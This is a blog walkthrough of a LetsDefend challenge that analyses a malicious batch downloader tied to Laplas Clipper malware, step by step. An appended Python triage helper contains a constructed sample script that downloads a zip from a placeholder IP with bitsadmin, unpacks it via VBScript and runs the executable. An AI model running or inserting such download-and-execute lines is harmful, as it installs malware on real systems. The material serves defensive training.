LetsDefend— Batch Challenge Walkthrough
Investigating a Malicious Batch Script with Notepad++ & Microsoft Learn
Introduction:
Have you ever wanted to analyze a batch file to determine whether it is malicious or safe? If this topic sounds interesting to you, you’ve stumbled on the right blog!
Welcome to my weekly walkthrough. This week, we’re tackling the Batch Downloader from LetsDefend! This challenge has us security analysts dissecting the content of a malicious batch file (.bat) to better understand what it does.
To perform the investigation, we’ll use Notepad++, a powerful text editor, to examine the file. We’ll also leverage Microsoft Learn documentation to cross-reference our findings, giving us valuable background and context to fully understand the script’s behavior. Sounds like a fun time, right? Let’s get to it!
And hey, if you find this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. Thanks for reading!
Challenge Link: https://app.letsdefend.io/challenge/batch-downloader
Challenge Scenario:
A malicious batch file has been discovered that downloads and executes files associated with the Laplas Clipper malware. Analyze this batch file to understand its behavior and help us investigate its activities.
Question 1: What command is used to prevent the command echoing in the console?
Let’s kick off our investigation! Before diving into the challenge file, it’s always a smart idea to understand what tools are available to us for analysis. To check what we have, we can open the Tools folder on the Desktop of the analysis virtual machine.
For this challenge we will be analyzing a batch file (.bat), which is a script interpreted by the Windows command shell (cmd.exe). As a batch file is plain text and can be opened and edited in any text editor, we will be using Notepad++ for the analysis.
Now, let’s navigate to the ChallengeFile folder and extract the 1.zip archive. Inside will be another nested file, go ahead and extract that one too so that we can access the malicious .bat file.
Finally, let’s open the batch file with Notepad++ so we can begin analyzing the contents.
To answer Question 1, we’re looking for the command that prevents echoing to the console. Focusing on Line 1 in the script we’ll see the following:
@echo off
This command stops each subsequent command in the script from being echoed to the console as it runs, which hides what the script is doing from anyone watching the window.
Question 2: Which tool is used to download a file from a specified URL in the script?
Okay, to answer Question 2, we’re going to focus on Line 2 of the script.
Quickly scanning Line 2, we see some evidence of download activity including a URL, so we’re looking in the correct spot.
Let’s get a better idea of what the bitsadmin command is and how it can be used to perform download jobs. Below is a description of Bitsadmin from Microsoft Learn:
Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress. The bitsadmin tool uses switches to identify the work to perform.
So, Bitsadmin uses these switches with the syntax below to perform transfer jobs:
bitsadmin /transfer <name> [<type>] [/priority <job_priority>] [/ACLflags <flags>] [/DYNAMIC] <remotefilename> <localfilename>
With this bit of background, we can now confirm that bitsadmin is the correct tool being used to download the file. Let’s check our work and continue the investigation!
Question 3: What is the priority set for the download operation in the script?
Let’s continue dissecting the bitsadmin command on line 2 and focus on the switches used.
Referring to the bitsadmin syntax from the previous question, we will see a /priority switch. According to the Microsoft Learn reference, there are a few options to set the priority of the download job:
/priority (optional): Sets the priority of the job, including:
FOREGROUND
HIGH
NORMAL
LOW
In the case of this script, the job is set to the highest priority, FOREGROUND.
Question 4: Which command is used to start localization of environment changes in the script?
To answer Question 4, we need to locate a command for localization. Let’s take a closer look at line 3 — setlocal.
Going back to Microsoft Learn for reference, we can confirm that the setlocal command “starts localization of environment variables in a batch file.”
Question 5: Which IP address is used by malicious code?
Fortunately, locating the answer to Question 5 is straightforward — an IP address is readily visible in line 2.
While this is the only IP address in the batch script, let’s gather some additional threat intelligence by checking it against VirusTotal to see if we can get any hits that it’s malicious:
Okay, we’ve got a number of hits that this IP address is malicious and even some community reports attributing it to the Laplas Clipper malware mentioned in the challenge scenario!
Question 6: What is the name of the subroutine called to extract the contents of the zip file?
All right, back to analyzing the script. This time, we’re going to focus on lines 5 & 10 since we are looking for an unzip operation to extract the file downloaded from the malicious IP from Question 5.
If we look at line 5 there is a call to :UnZipFile and then in line 10, we’ll see the parameters of the subroutine.
Without dissecting each line, we can infer that this is the correct subroutine that extracts the contents of the .zip file downloaded from the malicious IP.
Question 7: Which command attempts to start an executable file extracted from the zip file?
Based on what we learned in the previous question, we know that after download, the batch script extracts the contents of the retrieved .zip file.
To answer Question 7, we need to identify the command which then runs the executable (.exe) extracted from the archive. Let’s point our attention to line 7 with the start command.
Referencing Microsoft Learn the start command “starts a separate Command Prompt window to run a specified program or command.” In our example, the script uses start to launch the malicious executable.
Now that we have confirmed what start does, we can copy all of line 7 to answer Question 7.
Question 8: Which scripting language is used to extract the contents of the zip file?
We’ve made it to the last question! To answer Question 8, we’re going to revisit the UnZipFile subroutine that we looked at in Question 7.
There are a couple of clues here that point us to the correct answer.
- In line 11 we see the vbs variable is setting a path ending with the .vbs extension.
- The second clue is the command in line 22, cscript. Cscript is a command typically used to run Windows Script files, like .vbs files.
But what is a .vbs file then? It is a file extension for VBScript. VBScript is an older scripting language that is used to automate tasks on Windows systems.
In the malicious script we are analyzing, it is used to extract the contents of the .zip file.
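As an added example (not part of the original walkthrough or the challenge file), here is a small Python triage helper that pulls out the same indicators the eight questions ask about: @echo off, the bitsadmin transfer and its /priority, any IPv4 addresses, call :subroutine targets, start lines, and script engines such as cscript. The batch text it runs on is a constructed sample that mirrors the structure described above; the IP and URL in it are placeholders, not values from the challenge.

```python
import re

# Constructed sample mirroring the layout the walkthrough describes
# (not the real challenge file); the IP and URL are placeholders.
SAMPLE_BAT = r"""@echo off
bitsadmin /transfer job1 /priority FOREGROUND http://192.0.2.10/payload.zip %TEMP%\1.zip
setlocal
set "zip=%TEMP%\1.zip"
call :UnZipFile "%TEMP%\out" "%zip%"
cd /d "%TEMP%\out"
start "" "%TEMP%\out\payload.exe"
exit /b
:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
cscript //nologo %vbs%
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def triage_batch(text):
    """Static triage of a batch script: collect the indicators an analyst
    would note (echo suppression, downloader, priority, IPs, subroutines,
    start lines and script engines) without executing anything."""
    findings = {"echo_off": False, "downloader": None, "priority": None,
                "ips": [], "subroutine_calls": [], "start_lines": [],
                "script_engines": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith(("rem ", "::")):
            continue  # skip blanks and comments
        tokens = line.split()
        low = [t.lower() for t in tokens]
        cmd = low[0]
        if cmd == "@echo" and len(low) > 1 and low[1] == "off":
            findings["echo_off"] = True
        elif cmd == "bitsadmin" and "/transfer" in low:
            findings["downloader"] = "bitsadmin"
            if "/priority" in low and low.index("/priority") + 1 < len(tokens):
                findings["priority"] = tokens[low.index("/priority") + 1].upper()
        elif cmd == "call" and len(tokens) > 1 and tokens[1].startswith(":"):
            findings["subroutine_calls"].append(tokens[1])  # e.g. :UnZipFile
        elif cmd == "start":
            findings["start_lines"].append(line)  # what the script launches
        elif cmd in ("cscript", "wscript", "mshta", "powershell"):
            findings["script_engines"].append(cmd)
        for ip in IPV4.findall(line):
            if ip not in findings["ips"]:
                findings["ips"].append(ip)
    return findings
```

Each IP the helper returns is a candidate for a reputation lookup such as the VirusTotal check performed in Question 5.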
Conclusion:
And there we have it! We’ve successfully analyzed the malicious batch file and dug into the details of how it works. With the help of Notepad++, we’ve identified how the script downloads a second-stage payload, detailed where it downloads from, how it’s extracted, and how it is executed.
With our objectives completed, let’s close out this walkthrough of the Batch Downloader challenge!
A big thank you to LetsDefend for another educational (and fun) challenge! While this challenge is intended for beginners, it’s always extremely valuable to brush up on our research skills. Using Microsoft Learn to add context helped me gain a much better understanding of how this script works and various areas that we could improve our defenses against these types of attacks.
Again, if you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!
Until next week’s challenge — stay curious and be safe out there!
Tools & References:
Microsoft Learn (Windows Commands): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands
Notepad++: https://notepad-plus-plus.org/
Microsoft Learn (Echo): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/echo
Microsoft Learn (Bitsadmin): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin
Microsoft Learn (Bitsadmin Transfer): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-transfer
Microsoft Learn (setlocal): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/setlocal
VirusTotal: https://www.virustotal.com/gui/ip-address/193.169.255.78/detection
Microsoft Learn (start): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start
Microsoft Learn (cscript): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cscript
Wikipedia (VBScript): https://en.wikipedia.org/wiki/VBScript